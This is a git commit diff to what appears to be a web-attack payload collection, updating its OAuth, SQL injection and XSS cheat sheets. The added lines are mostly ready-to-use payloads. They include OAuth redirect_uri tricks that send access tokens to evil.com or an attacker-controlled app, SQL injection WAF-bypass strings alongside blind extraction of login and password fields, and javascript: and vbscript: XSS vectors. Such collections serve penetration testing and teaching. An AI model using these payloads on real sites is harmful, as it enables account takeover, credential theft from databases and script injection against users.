XSS,SQL OAuth Updated
parent
7d67aa4e0d
commit
07388503b0
|
@ -1,12 +1,20 @@
|
|||
# OAuth 2 - Common vulnerabilities
|
||||
|
||||
## Grabbing OAuth Token via redirect_uri
|
||||
Redirect to a controlled domain to get the access token
|
||||
```
|
||||
https://www.example.com/signin/authorize?[...]&redirect_uri=https://demo.example.com/loginsuccessful
|
||||
https://www.example.com/signin/authorize?[...]&redirect_uri=https://localhost
|
||||
https://www.example.com/signin/authorize?[...]&redirect_uri=https://localhost.evil.com
|
||||
https://www.example.com/oauth20_authorize.srf?[...]&redirect_uri=https://accounts.google.com/BackToAuthSubTarget?next=https://evil.com
|
||||
```
|
||||
|
||||
Redirect to an accepted Open URL in to get the access token
|
||||
```
|
||||
https://www.example.com/oauth20_authorize.srf?[...]&redirect_uri=https://accounts.google.com/BackToAuthSubTarget?next=https://evil.com
|
||||
https://www.example.com/oauth2/authorize?[...]&redirect_uri=https%3A%2F%2Fapps.facebook.com%2Fattacker%2F
|
||||
```
|
||||
OAuth implementations should never whitelist entire domains, only a few URLs so that “redirect_uri” can’t be pointed to an Open Redirect.
|
||||
|
||||
|
||||
Sometimes you need to change the scope to an invalid one to bypass a filter on redirect_uri:
|
||||
```
|
||||
https://www.example.com/admin/oauth/authorize?[...]&scope=a&redirect_uri=https://evil.com
|
||||
|
@ -31,3 +39,4 @@ and SHOULD revoke (when possible) all tokens previously issued based on that aut
|
|||
* http://blog.intothesymmetry.com/2016/11/all-your-paypal-tokens-belong-to-me.html
|
||||
* http://homakov.blogspot.ch/2014/02/how-i-hacked-github-again.html
|
||||
* http://intothesymmetry.blogspot.ch/2014/04/oauth-2-how-i-have-hacked-facebook.html
|
||||
* http://andrisatteka.blogspot.ch/2014/09/how-microsoft-is-giving-your-data-to.html
|
||||
|
|
|
@ -5,12 +5,9 @@ I <3 pull requests :)
|
|||
|
||||
Last modifications :
|
||||
* XSS paylods improved
|
||||
* Methodology added
|
||||
* OAuth vulnerabilities added
|
||||
* AWS Bucket added
|
||||
|
||||
|
||||
Extract nice bypass from https://websec.wordpress.com/2010/03/19/exploiting-hard-filtered-sql-injections/
|
||||
|
||||
* SQL payloads updated
|
||||
|
||||
# Tools
|
||||
|
||||
|
|
|
@ -40,7 +40,6 @@ AND MAKE_SET(YOLO<(SELECT(length(concat(login,password)))),1)
|
|||
AND MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
|
||||
```
|
||||
|
||||
|
||||
##MYSQL Time Based
|
||||
```
|
||||
+BENCHMARK(40000000,SHA1(1337))+
|
||||
|
|
|
@ -112,6 +112,42 @@ admin") or "1"="1"/*
|
|||
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
|
||||
```
|
||||
|
||||
## WAF Bypass
|
||||
|
||||
No Whitespace - bypass using comments
|
||||
```
|
||||
?id=1/*comment*/and/**/1=1/**/--
|
||||
```
|
||||
|
||||
No Whitespace - bypass using parenthesis
|
||||
```
|
||||
?id=(1)and(1)=(1)--
|
||||
```
|
||||
|
||||
No Comma - bypass using OFFSET and FROM
|
||||
```
|
||||
LIMIT 0,1 -> LIMIT 1 OFFSET 0
|
||||
SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1).
|
||||
```
|
||||
|
||||
Blacklist using keywords - bypass using uppercase/lowercase
|
||||
```
|
||||
?id=1 AND 1=1#
|
||||
?id=1 AnD 1=1#
|
||||
?id=1 aNd 1=1#
|
||||
```
|
||||
|
||||
Blacklist using keywords case insensitive - bypass using equivalent
|
||||
```
|
||||
AND -> &&
|
||||
OR -> ||
|
||||
= -> LIKE,REGEXP, not < and not >
|
||||
WHERE -> HAVING
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
## Thanks to - Other resources
|
||||
* MySQL:
|
||||
- [PentestMonkey's mySQL injection cheat sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet)
|
||||
|
|
|
@ -113,6 +113,9 @@ java%0dscript:alert(1) - CR (\r)
|
|||
Using the escape character
|
||||
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
|
||||
|
||||
Using the newline and a comment //
|
||||
javascript://%0Aalert(1)
|
||||
javascript://anything%0D%0A%0D%0Awindow.alert(1)
|
||||
```
|
||||
|
||||
XSS with data:
|
||||
|
@ -121,7 +124,10 @@ data:text/html,<script>alert(0)</script>
|
|||
data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+
|
||||
```
|
||||
|
||||
|
||||
XSS with vbscript: only IE
|
||||
```
|
||||
vbscript:msgbox("XSS")
|
||||
```
|
||||
## XSS in files
|
||||
XSS in XML
|
||||
```
|
||||
|
|
Loading…
Reference in New Issue